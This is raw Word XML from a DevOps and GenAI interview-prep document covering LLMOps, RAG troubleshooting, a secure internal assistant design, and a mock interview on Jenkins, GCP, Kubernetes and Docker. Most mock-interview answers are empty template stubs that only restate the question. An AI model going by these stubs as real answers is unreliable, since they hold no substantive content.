      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Traditional MLOps focuses on training, validating, deploying, and monitoring predictive models. LLMOps adds prompt management, retrieval pipelines, vector indexes, model provider routing, token and cost monitoring, hallucination evaluation, safety filters, conversation logs, and tool-calling governance. In LLMOps, behavior can change due to prompts, model versions, retrieval content, embeddings, and provider updates, so traceability is very important.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q27. A RAG chatbot is giving wrong answers from old documents. How would you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would check whether the old documents are still in the source repository, ingestion pipeline, vector database, or cache. Then I would inspect document metadata, timestamps, chunk IDs, embedding/index refresh status, retrieval results for the failing question, reranking behavior, and prompt instructions. I would also check whether access filters are excluding newer documents. The fix may involve deleting stale vectors, rebuilding the index, improving metadata filters, changing chunking, or adding freshness ranking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q28. Design a secure internal GenAI assistant for DevOps teams to query runbooks, incidents, and Kubernetes troubleshooting steps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/System Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would design it as an authenticated internal assistant backed by RAG over approved runbooks, incident postmortems, Kubernetes docs, and platform standards. Users authenticate through the company identity provider, and retrieval filters enforce team and environment access. The backend retrieves relevant documents, includes citations, and refuses unsupported answers. For troubleshooting, tool calls can query read-only Kubernetes or monitoring APIs with strict permissions. I would add audit logs, prompt injection protection, DLP checks, feedback collection, evaluation datasets, dashboards for quality and cost, and human approval before any write or remediation action.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 77 - Senior DevOps, GCP, Kubernetes and Terraform Production Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Explain your Jenkins pipeline architecture.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your Jenkins pipeline architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What stages do you include in your CI/CD pipeline?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stages do you include in your CI/CD pipeline?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How do you integrate third-party tools like Prisma Cloud, Stream Security, or Datadog into Jenkins?</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integrate third-party tools like Prisma Cloud, Stream Security, or Datadog into Jenkins?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. What is a multi-stage Jenkins pipeline?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multi-stage Jenkins pipeline?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Your Jenkins pipeline suddenly starts failing after hundreds of successful builds. How do you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/Troubleshooting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Jenkins pipeline suddenly starts failing after hundreds of successful builds. How do you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Where do you start troubleshooting—a cloud service, the application, or Jenkins?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/Troubleshooting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start troubleshooting—a cloud service, the application, or Jenkins?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Design a complete CI/CD pipeline for a Java microservices application from code merge to production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/System Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/System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complete CI/CD pipeline for a Java microservices application from code merge to production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Would you use a Scripted Pipeline or Declarative Pipeline? Why?</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Would you use a Scripted Pipeline or Declarative Pipeline? Why?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. What is a Jenkinsfile?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/Jenkins</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Jenkinsfile is a text file, checked into source control alongside the application code, that defines a Jenkins pipeline's stages and steps as code, so the build/test/deploy process is versioned and reviewable like any other code change.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. Which type of pipeline is called a Jenkinsfile?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type of pipeline is called a Jenkinsfile?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. How would you rate yourself in GCP out of 10?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP/Experience</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP/Experience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rate yourself in GCP out of 10?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. What are the advantages of Compute Engine over traditional virtual machines?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP/Compute Engine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP/Compute Engine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advantages of Compute Engine over traditional virtual machines?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. What machine families are available in Compute Engine?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP/Compute Engine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP/Compute Engine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machine families are available in Compute Engine?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. A production VM becomes unreachable. How do you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP/Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP/Troubleshooting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production VM becomes unreachable. How do you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. If an entire GCP region goes down, what is your disaster recovery strategy?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP/Disaster Recovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP/Disaster Recovery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an entire GCP region goes down, what is your disaster recovery strategy?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. How would you improve security in GCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP/Security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improve security in GCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. A VM in VPC-A cannot communicate with a VM in VPC-B. How do you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP/Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP/Networking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VM in VPC-A cannot communicate with a VM in VPC-B. How do you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q18. CPU utilization is only 20%, but application latency has doubled. How do you investigate it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP/Performance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP/Performance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CPU utilization is only 20%, but application latency has doubled. How do you investigate it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q19. Compare Cloud Run, GKE, Compute Engine, and App Engine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP/Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP/Architecture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Compare Cloud Run, GKE, Compute Engine, and App Engine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q20. What are the Kubernetes Service types?</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Kubernetes Service types?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q21. A Service is not routing traffic to the correct Pod. How do you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Troubleshooting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Service is not routing traffic to the correct Pod. How do you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q22. Explain the Kubernetes architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Architecture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Kubernetes architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q23. Which components communicate with each other in Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Architecture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components communicate with each other in Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q24. Where do ConfigMaps and Secrets fit into the Kubernetes architecture?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Configuration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ConfigMaps and Secrets fit into the Kubernetes architecture?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q25. What deployment strategies are available in Kubernetes?</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deployment strategies are available in Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q26. Which deployment strategy do you prefer in production and why?</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deployment strategy do you prefer in production and why?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q27. Explain Horizontal Pod Autoscaler (HPA).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Autoscaling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Autoscaling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Horizontal Pod Autoscaler (HPA).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q28. Explain Vertical Pod Autoscaler (VPA).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Autoscaling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Autoscaling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Vertical Pod Autoscaler (VPA).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q29. Pods are getting killed automatically. How do you determine whether it’s OOMKilled, node resource pressure, or another issue?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Troubleshooting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Pods are getting killed automatically. How do you determine whether it’s OOMKilled, node resource pressure, or another issue?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q30. Multiple pods are in CrashLoopBackOff. How do you restore production quickly?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Incident Response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Incident Response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Multiple pods are in CrashLoopBackOff. How do you restore production quickly?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q31. Name the common Dockerfile instructions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker/Dockerfile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker/Dockerfile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Name the common Dockerfile instructions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q32. How do you scan Docker images for vulnerabilities?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker/Security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scan Docker images for vulnerabilities?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q33. What is a multi-stage Docker build?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker/Build</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker/Build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multi-stage Docker build?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q34. Do Docker containers have separate kernels or do they share the host kernel?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker/Runtime</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker/Runtime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Docker containers have separate kernels or do they share the host kernel?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q35. How does a container communicate with the Linux kernel?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker/Runtime</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
